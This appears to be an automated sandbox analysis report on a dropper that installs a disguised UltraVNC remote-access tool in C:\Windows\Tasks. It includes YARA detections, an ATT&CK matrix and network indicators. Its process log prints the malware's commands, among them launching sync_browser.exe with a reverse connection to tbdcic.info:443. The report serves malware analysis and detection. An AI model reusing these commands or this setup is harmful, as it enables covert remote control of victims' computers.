Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	19_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	19_2_00007FF740005910
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF74002C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	23_2_00007FF74002C210
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400BA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,	23_2_00007FF7400BA228
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740026DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,	23_2_00007FF740026DD1
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF740005910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,	23_2_00007FF740005910

Source: C:\Windows\Tasks\sync_browser.exe

19_2_00007FF740026DD1

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740019260 GetVersionExA,GetVersionExA,GetModuleHandleA,GetProcAddress,GetSystemInfo,

19_2_00007FF740019260

Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V PowerShell Direct Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Time Synchronization Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: sync_browser.exe, 00000013.00000002.3976778685.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll'
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: sync_browser.exe, 00000017.00000002.2298387181.0000000000AFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: sync_browser.exe, 00000017.00000002.2298507097.0000000002595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\Tasks\sync_browser.exe	API call chain: ExitProcess graph end node			graph_19-22314
Source: C:\Windows\Tasks\sync_browser.exe	API call chain: ExitProcess graph end node

Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

19_2_00007FF7400B7220

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400126B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,

19_2_00007FF7400126B0

Source: C:\Windows\Tasks\sync_browser.exe

19_2_00007FF740069BC0

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,

0_2_0040236F

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	19_2_00007FF7400B7220
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 19_2_00007FF7400C47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_00007FF7400C47E4
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400B7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	23_2_00007FF7400B7220
Source: C:\Windows\Tasks\sync_browser.exe	Code function: 23_2_00007FF7400C47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	23_2_00007FF7400C47E4

Source: C:\Windows\Tasks\sync_browser.exe

Code function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe

23_2_00007FF740069BC0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400099C0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,

19_2_00007FF7400099C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400174C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,

19_2_00007FF7400174C0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740004390 Sleep,CreateThread,CloseHandle,SendMessageA,FindWindowA,PostMessageA,SendMessageA,mouse_event,Sleep,mouse_event,FindWindowA,PostMessageA,

19_2_00007FF740004390

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\." "%CD%\..\..\..\..\..\..\Windows\Tasks\"	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 4735396734841324 4735396734841324.cmd	Jump to behavior
Source: C:\Users\user\Desktop\mSRW5AfJpC.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 4735396734841324.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 1	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_TtF9ns -connect tbdcic.info:443	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 2	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 4	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 42	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im sync_browser.exe

Jump to behavior

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740017B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,

19_2_00007FF740017B90

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_0040244E

Source: sync_browser.exe.6.dr	Binary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr	Binary or memory string: Program Manager
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr	Binary or memory string: Shell_TrayWnd
Source: sync_browser.exe, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr	Binary or memory string: Progman
Source: mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,

0_2_00402187

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,

0_2_00401815

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF740069EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,

19_2_00007FF740069EF0

Source: C:\Windows\Tasks\sync_browser.exe

Code function: 19_2_00007FF7400BDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_00007FF7400BDF80

Source: C:\Users\user\Desktop\mSRW5AfJpC.exe

Code function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,calloc,calloc,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

0_2_00405721

Stealing of Sensitive Information

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 19.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mSRW5AfJpC.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, type: DROPPED

Remote Access Functionality

Yara detected UltraVNC Hacktool

Source: Yara match	File source: 19.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.0.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.sync_browser.exe.7ff740000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2298861822.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mSRW5AfJpC.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 7968, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sync_browser.exe PID: 8104, type: MEMORYSTR
Source: Yara match	File source: C:\Windows\Tasks\Fgyxfc.Qnwi4I, type: DROPPED
Source: Yara match	File source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I, type: DROPPED

Contains VNC / remote desktop functionality (version string found)

Source: sync_browser.exe, 00000013.00000002.3977022191.00000000028A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008
Source: sync_browser.exe, 00000013.00000003.2412015746.00000000028AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: RFB 003.008

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	12 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Windows Service	1 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	121 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Access Token Manipulation	1 Timestomp	NTDS	4 File and Directory Discovery	Distributed Component Object Model	3 Clipboard Data	1 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Service Execution	1 Bootkit	11 Windows Service	1 DLL Side-Loading	LSA Secrets	26 System Information Discovery	SSH	Keylogging	2 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	22 Process Injection	231 Masquerading	Cached Domain Credentials	31 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Scheduled Task/Job	1 Valid Accounts	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Virtualization/Sandbox Evasion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	22 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Bootkit	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
mSRW5AfJpC.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU	0%	ReversingLabs
C:\Windows\Tasks\Fgyxfc.Qnwi4I	0%	ReversingLabs
C:\Windows\Tasks\Ivn55G.PqhJnU	0%	ReversingLabs
C:\Windows\Tasks\conhost.exe	0%	ReversingLabs
C:\Windows\Tasks\sync_browser.exe	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
tbdcic.info	194.190.152.201	true	false	high
bg.microsoft.map.fastly.net	199.232.214.172	true	false	high
x1.i.lencr.org	unknown	unknown	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.uvnc.com	mSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	high
http://x1.i.lencr.org/	2D85F72862B55C4EADD9E66E06947F3D0.12.dr	false	high
http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1	mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.dr	false	high
